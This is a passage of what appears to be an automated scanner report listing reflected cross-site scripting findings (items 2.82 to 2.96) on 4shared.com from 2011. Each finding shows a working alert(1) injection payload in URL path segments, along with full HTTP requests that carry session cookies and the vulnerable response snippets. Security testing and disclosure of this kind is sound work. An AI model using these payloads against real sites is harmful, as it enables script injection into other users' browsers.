2.82. http://www.4shared.com/js/index.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/index.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe8c3"-alert(1)-"07080f1b397 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfe8c3"-alert(1)-"07080f1b397/index.js?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/desktop/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 404 /jsfe8c3&quot;-alert(1)-&quot;07080f1b397/index.js
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:37 GMT
Content-Length: 38803


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/jsfe8c3"-alert(1)-"07080f1b397/index.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.83. http://www.4shared.com/js/index.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/index.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bcd10'-alert(1)-'7b2303e759b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsbcd10'-alert(1)-'7b2303e759b/index.js?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/desktop/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 404 /jsbcd10'-alert(1)-'7b2303e759b/index.js
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:42 GMT
Content-Length: 38625


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/jsbcd10'-alert(1)-'7b2303e759b/index.js',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

func
...[SNIP]...

2.84. http://www.4shared.com/js/index.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/index.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3471e'-alert(1)-'697b2b3fba0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/index.js3471e'-alert(1)-'697b2b3fba0?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/desktop/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 404 /js/index.js3471e'-alert(1)-'697b2b3fba0
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:02:12 GMT
Content-Length: 38621


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
eof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/js/index.js3471e'-alert(1)-'697b2b3fba0',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.85. http://www.4shared.com/js/index.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/index.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8376c"-alert(1)-"23cab5e01c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/index.js8376c"-alert(1)-"23cab5e01c8?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/desktop/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 404 /js/index.js8376c&quot;-alert(1)-&quot;23cab5e01c8
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:02:10 GMT
Content-Length: 38799


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js/index.js8376c"-alert(1)-"23cab5e01c8";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.86. http://www.4shared.com/js/loginScript.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/loginScript.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29552"-alert(1)-"d9019f8d1ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js29552"-alert(1)-"d9019f8d1ea/loginScript.jsp?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js29552&quot;-alert(1)-&quot;d9019f8d1ea/loginScript.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:19 GMT
Content-Length: 38803


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js29552"-alert(1)-"d9019f8d1ea/loginScript.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

2.87. http://www.4shared.com/js/loginScript.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/loginScript.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb2cb'-alert(1)-'44a11509354 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jseb2cb'-alert(1)-'44a11509354/loginScript.jsp?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /jseb2cb'-alert(1)-'44a11509354/loginScript.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:22 GMT
Content-Length: 38626


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/jseb2cb'-alert(1)-'44a11509354/loginScript.jsp',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

2.88. http://www.4shared.com/js/loginScript.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/loginScript.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 968ec"-alert(1)-"27a6483c905 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/loginScript.jsp968ec"-alert(1)-"27a6483c905?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/loginScript.jsp968ec&quot;-alert(1)-&quot;27a6483c905
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:33 GMT
Content-Length: 38806


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js/loginScript.jsp968ec"-alert(1)-"27a6483c905";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.89. http://www.4shared.com/js/loginScript.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/loginScript.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f5cc'-alert(1)-'0dbfda8d792 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/loginScript.jsp1f5cc'-alert(1)-'0dbfda8d792?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/loginScript.jsp1f5cc'-alert(1)-'0dbfda8d792
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:35 GMT
Content-Length: 38628


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
inBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/js/loginScript.jsp1f5cc'-alert(1)-'0dbfda8d792',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.90. http://www.4shared.com/js/signup-script.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/signup-script.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93807"-alert(1)-"25dbcc111af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js93807"-alert(1)-"25dbcc111af/signup-script.jsp?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js93807&quot;-alert(1)-&quot;25dbcc111af/signup-script.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:10 GMT
Content-Length: 38638


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js93807"-alert(1)-"25dbcc111af/signup-script.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback(
...[SNIP]...

2.91. http://www.4shared.com/js/signup-script.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/signup-script.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload faa74'-alert(1)-'af3f7427ec1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfaa74'-alert(1)-'af3f7427ec1/signup-script.jsp?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /jsfaa74'-alert(1)-'af3f7427ec1/signup-script.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:13 GMT
Content-Length: 38636


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/jsfaa74'-alert(1)-'af3f7427ec1/signup-script.jsp',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}

...[SNIP]...

2.92. http://www.4shared.com/js/signup-script.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/signup-script.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b4b9'-alert(1)-'e0376698f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/signup-script.jsp2b4b9'-alert(1)-'e0376698f8?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/signup-script.jsp2b4b9'-alert(1)-'e0376698f8
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:26 GMT
Content-Length: 38813


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
Box == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/js/signup-script.jsp2b4b9'-alert(1)-'e0376698f8',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.93. http://www.4shared.com/js/signup-script.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/signup-script.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b523a"-alert(1)-"9bac3986693 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/signup-script.jspb523a"-alert(1)-"9bac3986693?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/signup-script.jspb523a&quot;-alert(1)-&quot;9bac3986693
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:24 GMT
Content-Length: 38633


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js/signup-script.jspb523a"-alert(1)-"9bac3986693";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.94. http://www.4shared.com/login.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /login.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c153c"-alert(1)-"950b51e8972 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login.jspc153c"-alert(1)-"950b51e8972 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563

Response

HTTP/1.1 404 /login.jspc153c&quot;-alert(1)-&quot;950b51e8972
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:37 GMT
Content-Length: 38584


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/login.jspc153c"-alert(1)-"950b51e8972";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.95. http://www.4shared.com/login.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /login.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c0c7'-alert(1)-'2190480f510 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login.jsp7c0c7'-alert(1)-'2190480f510 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563

Response

HTTP/1.1 404 /login.jsp7c0c7'-alert(1)-'2190480f510
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:42 GMT
Content-Length: 38580


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
ypeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/login.jsp7c0c7'-alert(1)-'2190480f510',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.96. http://www.4shared.com/m/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /m/

Issue detail

